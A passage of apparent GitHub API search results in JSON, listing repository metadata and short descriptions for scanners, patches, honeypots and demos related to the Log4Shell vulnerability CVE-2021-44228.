"C1-WS-LOG4SHELL", + "full_name": "JustinDPerkins\/C1-WS-LOG4SHELL", + "owner": { + "login": "JustinDPerkins", + "id": 60413733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60413733?v=4", + "html_url": "https:\/\/github.com\/JustinDPerkins", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JustinDPerkins\/C1-WS-LOG4SHELL", + "description": "Quick Deploy to show case cve-2021-44228", + "fork": false, + "created_at": "2021-12-15T03:20:25Z", + "updated_at": "2021-12-17T17:07:45Z", + "pushed_at": "2021-12-17T17:07:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438490030, + "name": "Log4j-Updater", + "full_name": "VinniMarcon\/Log4j-Updater", + "owner": { + "login": "VinniMarcon", + "id": 42422427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42422427?v=4", + "html_url": "https:\/\/github.com\/VinniMarcon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VinniMarcon\/Log4j-Updater", + "description": "Log4J Updater Bash Script to automate the framework update process on numerous machines and prevent the CVE-2021-44228", + "fork": false, + "created_at": "2021-12-15T04:08:15Z", + "updated_at": "2021-12-16T17:25:55Z", + "pushed_at": "2021-12-15T06:20:17Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438504265, + "name": "log4j-vul", + "full_name": "bhprin\/log4j-vul", + "owner": { + "login": "bhprin", + "id": 1876456, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1876456?v=4", + "html_url": "https:\/\/github.com\/bhprin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bhprin\/log4j-vul", + "description": "This project is just to show Apache Log4j2 Vulnerability - aka CVE-2021-44228", + "fork": false, + "created_at": "2021-12-15T05:19:13Z", + "updated_at": "2021-12-22T04:39:30Z", + "pushed_at": "2023-01-31T08:17:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438523356, + "name": "CVE-2021-44228", + "full_name": "avirahul007\/CVE-2021-44228", + "owner": { + "login": "avirahul007", + "id": 63554722, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63554722?v=4", + "html_url": "https:\/\/github.com\/avirahul007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/avirahul007\/CVE-2021-44228", + "description": null, + "fork": false, + "created_at": "2021-12-15T06:40:35Z", + "updated_at": "2021-12-15T06:40:35Z", + "pushed_at": "2021-12-15T06:40:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438541418, + "name": "log4j-log4shell-playground", + "full_name": "rgl\/log4j-log4shell-playground", + "owner": { + "login": "rgl", + "id": 43356, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43356?v=4", + "html_url": "https:\/\/github.com\/rgl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rgl\/log4j-log4shell-playground", + "description": "A playground for poking at the Log4Shell (CVE-2021-44228) vulnerability mitigations", + "fork": false, + "created_at": "2021-12-15T07:51:12Z", + "updated_at": "2021-12-16T11:59:53Z", + "pushed_at": "2021-12-15T08:44:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "log4j", + "log4shell" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 438541504, + "name": "how-to-check-patch-secure-log4j-CVE-2021-44228", + "full_name": "anuvindhs\/how-to-check-patch-secure-log4j-CVE-2021-44228", + "owner": { + "login": "anuvindhs", + "id": 46879183, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46879183?v=4", + "html_url": "https:\/\/github.com\/anuvindhs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/anuvindhs\/how-to-check-patch-secure-log4j-CVE-2021-44228", + "description": "A one-stop repo\/ information hub for all log4j vulnerability-related information.", + "fork": false, + "created_at": "2021-12-15T07:51:28Z", + "updated_at": "2022-03-17T16:19:51Z", + "pushed_at": "2022-01-14T05:38:05Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "log4j", + "vulnerability-detection" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438593574, + "name": "Get-log4j-Windows.ps1", + "full_name": "KeysAU\/Get-log4j-Windows.ps1", + "owner": { + "login": "KeysAU", + "id": 38932932, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38932932?v=4", + "html_url": "https:\/\/github.com\/KeysAU", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KeysAU\/Get-log4j-Windows.ps1", + "description": "Identifying all log4j components across all windows servers, entire domain, can be multi domain. CVE-2021-44228", + "fork": false, + "created_at": "2021-12-15T10:49:36Z", + "updated_at": "2022-01-12T12:25:17Z", + "pushed_at": "2021-12-20T06:29:15Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 438595299, + "name": "log4j-CVE-2021-44228", + "full_name": "kubearmor\/log4j-CVE-2021-44228", + "owner": { + "login": "kubearmor", + "id": 86793284, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86793284?v=4", + "html_url": "https:\/\/github.com\/kubearmor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kubearmor\/log4j-CVE-2021-44228", + "description": "Apache Log4j Zero Day Vulnerability aka Log4Shell aka CVE-2021-44228", + "fork": false, + "created_at": "2021-12-15T10:55:35Z", + "updated_at": "2024-07-02T20:27:26Z", + "pushed_at": "2021-12-15T16:29:14Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 8, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 438600716, + "name": "logpresso-CVE-2021-44228-Scanner", + "full_name": "jyotisahu98\/logpresso-CVE-2021-44228-Scanner", + "owner": { + "login": "jyotisahu98", + "id": 96179721, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96179721?v=4", + "html_url": "https:\/\/github.com\/jyotisahu98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jyotisahu98\/logpresso-CVE-2021-44228-Scanner", + "description": "Vulnerability scanner and mitigation patch for Log4j2 CVE-2021-44228", + "fork": false, + "created_at": "2021-12-15T11:15:25Z", + "updated_at": "2021-12-27T14:28:30Z", + "pushed_at": "2021-12-15T11:15:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438605924, + "name": "log4j-resources", + "full_name": "gitlab-de\/log4j-resources", + "owner": { + "login": "gitlab-de", + "id": 75491323, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75491323?v=4", + "html_url": "https:\/\/github.com\/gitlab-de", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gitlab-de\/log4j-resources", + "description": "This repository is designed to be a collection of resources to learn about, detect and mitigate the impact of the Log4j vulnerability - more formally known as CVE-2021-44228 and CVE-2021-45046 (mirror from GitLab.com)", + "fork": false, + "created_at": "2021-12-15T11:34:02Z", + "updated_at": "2021-12-18T15:25:17Z", + "pushed_at": "2021-12-18T15:25:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "cve-2021-45046", + "log4j" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 438615335, + "name": "Log4JHunt", + "full_name": "redhuntlabs\/Log4JHunt", + "owner": { + "login": "redhuntlabs", + "id": 36505047, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36505047?v=4", + "html_url": "https:\/\/github.com\/redhuntlabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redhuntlabs\/Log4JHunt", + "description": "An automated, reliable scanner for the Log4Shell (CVE-2021-44228) vulnerability.", + "fork": false, + "created_at": "2021-12-15T12:07:05Z", + "updated_at": "2024-05-11T11:36:22Z", + "pushed_at": "2021-12-17T07:41:47Z", + "stargazers_count": 43, + "watchers_count": 43, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 43, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 438635569, + "name": "log4shell-hotfix-side-effect", + "full_name": "mss\/log4shell-hotfix-side-effect", + "owner": { + "login": "mss", + "id": 5391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5391?v=4", + "html_url": "https:\/\/github.com\/mss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mss\/log4shell-hotfix-side-effect", + "description": "Test case to check if the Log4Shell\/CVE-2021-44228 hotfix will raise any unexpected exceptions", + "fork": false, + "created_at": "2021-12-15T13:14:34Z", + "updated_at": "2023-02-28T20:50:34Z", + "pushed_at": "2021-12-18T12:02:09Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "java", + "log4shell" + ], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438664340, + "name": "log4j-vuln-coverage-check", + "full_name": "MeterianHQ\/log4j-vuln-coverage-check", + "owner": { + "login": "MeterianHQ", + "id": 28596672, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28596672?v=4", + "html_url": "https:\/\/github.com\/MeterianHQ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MeterianHQ\/log4j-vuln-coverage-check", + "description": "A simple project to check coverage of Log4J vuln CVE-2021-44228 (and related)", + "fork": false, + "created_at": "2021-12-15T14:44:14Z", + "updated_at": "2021-12-16T14:00:05Z", + "pushed_at": "2022-12-01T09:18:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 438680847, + "name": "jmeter-fix-cve-2021-44228-windows", + "full_name": "sebiboga\/jmeter-fix-cve-2021-44228-windows", + "owner": { + "login": "sebiboga", + "id": 41440889, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41440889?v=4", + "html_url": "https:\/\/github.com\/sebiboga", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sebiboga\/jmeter-fix-cve-2021-44228-windows", + "description": "fix cve 44228 for windows", + "fork": false, + "created_at": "2021-12-15T15:34:19Z", + "updated_at": "2021-12-15T15:50:19Z", + "pushed_at": "2021-12-15T15:51:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 438683307, + "name": "log4shell-cloud-scanner", + "full_name": "mitiga\/log4shell-cloud-scanner", + "owner": { + "login": "mitiga", + "id": 82891013, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82891013?v=4", + "html_url": "https:\/\/github.com\/mitiga", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mitiga\/log4shell-cloud-scanner", + "description": "we are providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account. The script enables security teams to identify external-facing AWS assets by running the exploit on them, and thus be able to map them and quickly patch them", + "fork": false, + "created_at": "2021-12-15T15:42:06Z", + "updated_at": "2022-01-04T14:01:16Z", + "pushed_at": "2021-12-17T16:00:03Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 13, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 438689577, + "name": "Log4j", + "full_name": "isuruwa\/Log4j", + "owner": { + "login": "isuruwa", + "id": 72663288, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72663288?v=4", + "html_url": "https:\/\/github.com\/isuruwa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/isuruwa\/Log4j", + "description": "A scanner and a proof of sample exploit for log4j RCE CVE-2021-44228 ", + "fork": false, + "created_at": "2021-12-15T16:01:36Z", + "updated_at": "2024-08-12T20:18:56Z", + "pushed_at": "2022-08-06T15:26:04Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "java", + "log4j" + ], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 438692384, + "name": "log4shell-data", + "full_name": "honeynet\/log4shell-data", + "owner": { + "login": "honeynet", + "id": 3327517, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3327517?v=4", + "html_url": "https:\/\/github.com\/honeynet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/honeynet\/log4shell-data", + "description": "Data we are receiving from our honeypots about CVE-2021-44228", + "fork": false, + "created_at": "2021-12-15T16:10:54Z", + "updated_at": "2022-10-14T09:19:33Z", + "pushed_at": "2021-12-16T16:08:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 438695688, + "name": "checkmk-log4j-scanner", + "full_name": "inettgmbh\/checkmk-log4j-scanner", + "owner": { + "login": "inettgmbh", + "id": 12827152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12827152?v=4", + "html_url": "https:\/\/github.com\/inettgmbh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/inettgmbh\/checkmk-log4j-scanner", + "description": "Scans for Log4j versions effected by CVE-2021-44228", + "fork": false, + "created_at": "2021-12-15T16:21:26Z", + "updated_at": "2024-05-13T12:42:03Z", + "pushed_at": "2024-05-13T12:44:51Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "checkmk", + "log4j" + ], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 438719808, + "name": "CVE-2021-44228", + "full_name": "b1tm0n3r\/CVE-2021-44228", + "owner": { + "login": "b1tm0n3r", + "id": 61518601, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61518601?v=4", + "html_url": "https:\/\/github.com\/b1tm0n3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b1tm0n3r\/CVE-2021-44228", + "description": "CVE-2021-44228 demo webapp", + "fork": false, + "created_at": "2021-12-15T17:42:13Z", + "updated_at": "2021-12-20T19:25:27Z", + "pushed_at": "2021-12-20T19:25:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438739105, + "name": "CVE-2021-44228-Log4j", + "full_name": "VerveIndustrialProtection\/CVE-2021-44228-Log4j", + "owner": { + "login": "VerveIndustrialProtection", + "id": 96202973, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96202973?v=4", + "html_url": "https:\/\/github.com\/VerveIndustrialProtection", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VerveIndustrialProtection\/CVE-2021-44228-Log4j", + "description": null, + "fork": false, + "created_at": "2021-12-15T18:51:07Z", + "updated_at": "2022-01-01T14:37:49Z", + "pushed_at": "2022-01-04T21:10:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 438745261, + "name": "log4j", + "full_name": "alenazi90\/log4j", + "owner": { + "login": "alenazi90", + "id": 3836915, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3836915?v=4", + "html_url": "https:\/\/github.com\/alenazi90", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alenazi90\/log4j", + "description": "An automated header extensive scanner for detecting log4j RCE CVE-2021-44228", + "fork": false, + "created_at": "2021-12-15T19:15:00Z", + "updated_at": "2021-12-16T15:10:52Z", + "pushed_at": "2021-12-15T19:21:02Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 438747026, + "name": "log4j-cve-2021-44228", + "full_name": "pmontesd\/log4j-cve-2021-44228", + "owner": { + "login": "pmontesd", + "id": 8183561, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8183561?v=4", + "html_url": "https:\/\/github.com\/pmontesd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pmontesd\/log4j-cve-2021-44228", + "description": "Very simple Ansible playbook that scan filesystem for JAR files vulnerable to Log4Shell", + "fork": false, + "created_at": "2021-12-15T19:21:39Z", + "updated_at": "2022-01-12T13:13:44Z", + "pushed_at": "2021-12-15T20:39:16Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438756678, + "name": "log4shell", + "full_name": "LiveOverflow\/log4shell", + "owner": { + "login": "LiveOverflow", + "id": 12161158, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12161158?v=4", + "html_url": "https:\/\/github.com\/LiveOverflow", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LiveOverflow\/log4shell", + "description": "Small example repo for looking into log4j CVE-2021-44228", + "fork": false, + "created_at": "2021-12-15T19:59:38Z", + "updated_at": "2024-09-24T16:59:09Z", + "pushed_at": "2021-12-24T15:44:53Z", + "stargazers_count": 67, + "watchers_count": 67, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 67, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 438761150, + "name": "kubernetes-log4j-cve-2021-44228-node-agent", + "full_name": "aws-samples\/kubernetes-log4j-cve-2021-44228-node-agent", + "owner": { + "login": "aws-samples", + "id": 8931462, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8931462?v=4", + "html_url": "https:\/\/github.com\/aws-samples", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aws-samples\/kubernetes-log4j-cve-2021-44228-node-agent", + "description": null, + "fork": false, + "created_at": "2021-12-15T20:17:41Z", + "updated_at": "2023-10-19T15:47:11Z", + "pushed_at": "2022-08-26T14:56:01Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 2, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 438773632, + "name": "Log4Shell-Honeypot", + "full_name": "michaelsanford\/Log4Shell-Honeypot", + "owner": { + "login": "michaelsanford", + "id": 1800499, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1800499?v=4", + "html_url": "https:\/\/github.com\/michaelsanford", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/michaelsanford\/Log4Shell-Honeypot", + "description": "Dockerized honeypot for CVE-2021-44228.", + "fork": false, + "created_at": "2021-12-15T21:09:00Z", + "updated_at": "2023-06-22T04:46:02Z", + "pushed_at": "2024-11-25T05:57:14Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "docker", + "honeypot", + "python" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 438791130, + "name": "Log4Pot", + "full_name": "thomaspatzke\/Log4Pot", + "owner": { + "login": "thomaspatzke", + "id": 1845601, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1845601?v=4", + "html_url": "https:\/\/github.com\/thomaspatzke", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thomaspatzke\/Log4Pot", + "description": "A honeypot for the Log4Shell vulnerability (CVE-2021-44228).", + "fork": false, + "created_at": "2021-12-15T22:30:34Z", + "updated_at": "2024-09-21T11:37:46Z", + "pushed_at": "2022-04-26T14:30:54Z", + "stargazers_count": 90, + "watchers_count": 90, + "has_discussions": true, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 27, + "watchers": 90, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 438797049, + "name": "cve-2021-44228-rce-poc", + "full_name": "ubitech\/cve-2021-44228-rce-poc", + "owner": { + "login": "ubitech", + "id": 998323, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/998323?v=4", + "html_url": "https:\/\/github.com\/ubitech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ubitech\/cve-2021-44228-rce-poc", + "description": "A Remote Code Execution PoC for Log4Shell (CVE-2021-44228)", + "fork": false, + "created_at": "2021-12-15T23:00:25Z", + "updated_at": "2024-04-19T14:29:37Z", + "pushed_at": "2021-12-15T23:03:44Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 438825521, + "name": "log4v-vuln-check", + "full_name": "rv4l3r3\/log4v-vuln-check", + "owner": { + "login": "rv4l3r3", + "id": 90338959, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90338959?v=4", + "html_url": "https:\/\/github.com\/rv4l3r3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rv4l3r3\/log4v-vuln-check", + "description": "This script is used to perform a fast check if your server is possibly affected by CVE-2021-44228 (the log4j vulnerability).", + "fork": false, + "created_at": "2021-12-16T01:38:25Z", + "updated_at": "2021-12-20T22:11:34Z", + "pushed_at": "2021-12-20T22:11:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438853805, + "name": "log4j_scanner_wrapper", + "full_name": "dpomnean\/log4j_scanner_wrapper", + "owner": { + "login": "dpomnean", + "id": 17032114, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17032114?v=4", + "html_url": "https:\/\/github.com\/dpomnean", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dpomnean\/log4j_scanner_wrapper", + "description": "log4j vulnerability wrapper scanner for CVE-2021-44228", + "fork": false, + "created_at": "2021-12-16T03:57:41Z", + "updated_at": "2021-12-17T15:23:34Z", + "pushed_at": "2021-12-16T14:10:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 438920047, + "name": "CVE-2021-44228", + "full_name": "roxas-tan\/CVE-2021-44228", + "owner": { + "login": "roxas-tan", + "id": 63656689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63656689?v=4", + "html_url": "https:\/\/github.com\/roxas-tan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/roxas-tan\/CVE-2021-44228", + "description": "This Log4j RCE exploit originated from https:\/\/github.com\/tangxiaofeng7\/CVE-2021-44228-Apache-Log4j-Rce", + "fork": false, + "created_at": "2021-12-16T08:46:55Z", + "updated_at": "2023-11-29T06:51:14Z", + "pushed_at": "2021-12-16T08:59:14Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 438931405, + "name": "CVE-2021-44228", + "full_name": "shamo0\/CVE-2021-44228", + "owner": { + "login": "shamo0", + "id": 48299520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48299520?v=4", + "html_url": "https:\/\/github.com\/shamo0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shamo0\/CVE-2021-44228", + "description": "log4shell (CVE-2021-44228) scanning tool", + "fork": false, + "created_at": "2021-12-16T09:26:37Z", + "updated_at": "2024-08-12T20:18:57Z", + "pushed_at": "2021-12-16T10:00:15Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "2021", + "44228", + "apache", + "code", + "cve", + "cve-2021-44228", + "execution", + "exploit", + "log", + "log4j", + "log4j2", + "log4shell", + "logging", + "poc", + "rce", + "remote", + "scanner", + "scanning", + "tool" + ], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 438940454, + "name": "log4j-Scan-Burpsuite", + "full_name": "snow0715\/log4j-Scan-Burpsuite", + "owner": { + "login": "snow0715", + "id": 54879520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54879520?v=4", + "html_url": "https:\/\/github.com\/snow0715", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/snow0715\/log4j-Scan-Burpsuite", + "description": "Log4j漏洞(CVE-2021-44228)的Burpsuite检测插件", + "fork": false, + "created_at": "2021-12-16T09:58:02Z", + "updated_at": "2024-04-07T08:54:48Z", + "pushed_at": "2022-01-26T03:51:30Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438951347, + "name": "Log4j-Windows-Scanner", + "full_name": "Joefreedy\/Log4j-Windows-Scanner", + "owner": { + "login": "Joefreedy", + "id": 47759132, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47759132?v=4", + "html_url": "https:\/\/github.com\/Joefreedy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Joefreedy\/Log4j-Windows-Scanner", + "description": "CVE-2021-44228 vulnerability in Apache Log4j library | Log4j vulnerability scanner on Windows machines.", + "fork": false, + "created_at": "2021-12-16T10:37:16Z", + "updated_at": "2022-03-29T19:51:54Z", + "pushed_at": "2022-10-05T11:18:26Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 438971911, + "name": "log4fix", + "full_name": "Nanitor\/log4fix", + "owner": { + "login": "Nanitor", + "id": 6453685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6453685?v=4", + "html_url": "https:\/\/github.com\/Nanitor", + 